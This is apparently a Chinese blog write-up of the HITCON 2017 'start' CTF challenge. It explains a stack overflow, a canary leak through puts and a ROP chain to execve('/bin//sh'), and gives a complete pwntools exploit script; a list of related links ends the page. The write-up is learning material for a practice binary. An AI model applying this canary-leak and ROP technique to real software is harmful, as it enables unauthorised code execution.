前言

hitcon 2017start 题,比较简单,练练手。

题目链接:

https://gitee.com/hac425/blog_data/tree/master/hitcon2017

正文

rbp-0x20 读入 0xd9 的数据,溢出。

程序开了 cancary ,又后面直接 puts 把我们输入的打印出来

我们可以直接溢出到 cancary, 然后用 puts 泄露 cancary, 这里有个小 tips , cancary 的最低位 为 \x00, 我们需要多多溢出一个 字节,覆盖掉这个 \x00, 这样才能 泄露 cancary



拿到 cancary 后就是正常的 rop 了,直接使用

ROPgadget --binary ./start --ropchain

生成 rop 链,不过此时的 rop 链太长,我们需要改一改。

后面用来大量的 add 来设置 rax 设置后面的 syscall 的系统调用号。最后调用 execve(“/bin//sh”, 0, 0), 把这一大串直接用前面找到的 gadgets 替换掉即可。



长度刚好。

总结

rop 没必要一个一个手撸, 改改生成的就行,然后就是 send 之间一定要 sleep ,要不然玄学......

完整exp

#!/usr/bin/env python

# encoding: utf-8

from pwn import *

context.log_level = "debug"

from struct import pack

import time

# Padding goes here

p = ''

p += pack('<Q', 0x00000000004017f7) # pop rsi ; ret

p += pack('<Q', 0x00000000006cc080) # @ .data

p += pack('<Q', 0x000000000047a6e6) # pop rax ; pop rdx ; pop rbx ; ret

p += '/bin//sh'

p += pack('<Q', 0x4141414141414141) # padding

p += pack('<Q', 0x4141414141414141) # padding

p += pack('<Q', 0x0000000000475fc1) # mov qword ptr [rsi], rax ; ret

p += pack('<Q', 0x00000000004017f7) # pop rsi ; ret

p += pack('<Q', 0x00000000006cc088) # @ .data + 8

p += pack('<Q', 0x000000000042732f) # xor rax, rax ; ret

p += pack('<Q', 0x0000000000475fc1) # mov qword ptr [rsi], rax ; ret

p += pack('<Q', 0x00000000004005d5) # pop rdi ; ret

p += pack('<Q', 0x00000000006cc080) # @ .data

p += pack('<Q', 0x00000000004017f7) # pop rsi ; ret

p += pack('<Q', 0x00000000006cc088) # @ .data + 8

p += pack('<Q', 0x0000000000443776) # pop rdx ; ret

p += pack('<Q', 0x00000000006cc088) # @ .data + 8

p += p64(0x000000000047a6e6)

p += p64(59)

p += p64(0)

p += p64(0)

p += p64(0x0000000000468e75)

print(hex(len(p)))

print hex(len(p))

rop = p

r  = process("./start")

# gdb.attach(r, '''

# # bp *0x0400B5C

# bp *0x0400B96

# c

# 	''')

pause()

# it could send "b" *0x18 + "\n"

r.sendline("b" * ( 0x20 - 0x8 ))

time.sleep(0.2)

r.recvuntil("b" * ( 0x20 - 0x8 ))

r.recv(1)

cancary = u64("\x00" + r.recv(7))

log.info("get cancary: " + hex(cancary))

pause()

payload = "exit\n\x00"

payload += "b" * ( 0x20 - 0x8 - len(payload))  # padding for cancary

payload += p64(cancary)

payload += "A" * 8  # padding for ret

payload += rop    # rip

print hex(len(payload))

r.sendline(payload)

time.sleep(0.2)

r.interactive()

syscall to rop的更多相关文章

  1. 栈溢出之rop到syscall

    当程序开启了nx,但程序有syscall调用的时候.这时栈溢出的利用就可以通过rop来执行syscall的59号调用execve('/bin/sh',null,null),这是这次alictf一道pw ...

  2. D^3ctf两道 pwn

    这次 的D^3ctf 又是给吊打 难顶... 所以题都是赛后解出来的,在这感谢Peanuts师傅 unprintableV 看看保护: 看看伪代码,其实代码很少 void __cdecl menu() ...

  3. 20145236《网络对抗》进阶实验——64位Ubuntu 17.10.1 ROP攻击

    20145236<网络对抗>进阶实验--64位Ubuntu 17.10.1 ROP攻击 基础知识 ROP攻击 ROP全称为Retrun-oriented Programmming(面向返回 ...

  4. Linux pwn入门教程(3)——ROP技术

    作者:Tangerine@SAINTSEC 原文来自:https://bbs.ichunqiu.com/thread-42530-1-1.html 0×00 背景 在上一篇教程的<shellco ...

  5. 64位Ubuntu系统下ROP攻击

    64位Ubuntu系统下ROP攻击 基础知识 ROP攻击 ROP全称为Retrun-oriented Programmming(面向返回的编程)是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可 ...

  6. 一步一步pwn路由器之rop技术实战

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 这次程序也是 DVRF 里面的,他的路径是 pwnable/She ...

  7. No_leak(ret2ROP + 低字节改写到syscall)

    No_leak 有这种题,题目很短小,只有一个read函数,没有输出函数,这样的题怎么解呢?当然首先想到的是ret2dl,但是那个有点儿复杂.下面我来介绍一种简单的解法. 代码如下: //gcc 1. ...

  8. Syscall,API,ABI

    系统调用(Syscall):Linux2.6之前是使用int0x80(中断)来实现系统调用的,在2.6之后的内核是使用sysentry/sysexit(32位机器)指令来实现的系统调用,这两条指令是C ...

  9. 一步一步学ROP之linux_x64篇

    一步一步学ROP之linux_x64篇 一.序 **ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防 ...

随机推荐

  1. 【xsy1201】 随机游走 高斯消元

    题目大意:你有一个$n*m$的网格(有边界),你从$(1,1)$开始随机游走,求走到$(n,m)$的期望步数. 数据范围:$n≤10$,$m≤1000$. 我们令 $f[i][j]$表示从$(1,1) ...

  2. POJ 1169

    #include<iostream> #include<algorithm> #include<vector> #include<set> #defin ...

  3. Eclipse无法编译 build无效 没有class文件

    问题原因: 我遇到这个问题的原因是: maven 插件引起的,maven clean或maven build后,经常无法自动编译class(虽然project自动编译了,但是只有包文件夹名,而没有cl ...

  4. Linux Cluster环境下批量分发执行补丁

    转自:http://blog.csdn.net/napolunyishi/article/details/18219867 这两天做了一个需求,因为上一个版本的/tmp空间默认只分配了5G,而升级程序 ...

  5. (转)WebSphere 中池资源调优 - 线程池、连接池和 ORB

    WebSphere 中池资源调优 - 线程池.连接池和 ORB 来自:https://www.ibm.com/developerworks/cn/websphere/library/techartic ...

  6. python处理自然语言:1、调用LTP的API,2、使用pyltp

    最近在学习处理自然语言处理,就发现LTP的(哈工大语言云),这个比我最先使用的jieba分词更好,词库更大,功能也更强大. 这里介绍两种方法:1.调用LTP的API,2.使用pyltp,这里的方法基于 ...

  7. JAVA跨域资源访问CORSFilter

    当一个资源从与该资源本身所在的服务器不同的域或端口不同的域或不同的端口请求一个资源时,资源会发起一个跨域 HTTP 请求. 出于安全考虑,浏览器会限制从脚本内发起的跨域HTTP请求.跨域资源共享机制允 ...

  8. 【Express系列】第3篇——接入mysql

    通常来说,前后端分离的项目,前端负责界面渲染和操作型的业务逻辑,后端则负责数据存取和数据处理相关的业务逻辑. 既然设计数据,那就少不了数据库的使用.目前市面上流行着各种各样的数据库,这里不打算一一列举 ...

  9. springweb flux websocket

    直接上代码: import org.springframework.stereotype.Component; import org.springframework.web.reactive.sock ...

  10. php的数组变量

    数组就是存储同一类型的多个变量的 一种特殊的类型 php的数组有两种形态 1.普通类型 eg:$cars = array("Volvo","BMW"," ...